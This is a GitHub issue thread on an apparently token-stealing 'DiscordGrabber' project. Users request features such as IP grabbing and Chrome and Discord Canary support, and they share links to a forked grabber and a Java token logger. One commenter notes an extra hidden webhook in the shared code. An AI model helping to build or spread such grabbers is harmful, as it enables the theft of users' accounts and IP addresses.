### ISSUE TITLE
Your garbber is very good pls update

### ISSUE THREAD

**Issue by pp0236** [Xefer-0/DiscordGrabber#1]
pls update
Idea:
1. Garb Ip
2. Make it embed
3. Chrome Support
4. Discord Canary and PTB support

pp021#6607

**Comment by pp0236** [comment]
sorry this is Issuses lol

**Comment by B4RC0DE-TM** [comment]
I know how to do it!

**Comment by pp0236** [comment]
Too late im fork you garb lol

https://files.catbox.moe/o7sl93.java

**Comment by pp0236** [comment]
> I know how to do it! Check this https://github.com/Swag1400/java-discord-token-logger/blob/master/Main.java

Too late im fork this garb lol

https://files.catbox.moe/o7sl93.java

**Comment by smilingmiko** [comment]
@pp0236 can i use this instead? i saw there was already a webhook in the code other than where u put the code in.

**Comment by Xefer-0** [comment]
Hey, I know i am very late, I essentially left this project on the side for a while. I am uncertain what exactly you mean with fake system file, I'll push in about 10 minutes.
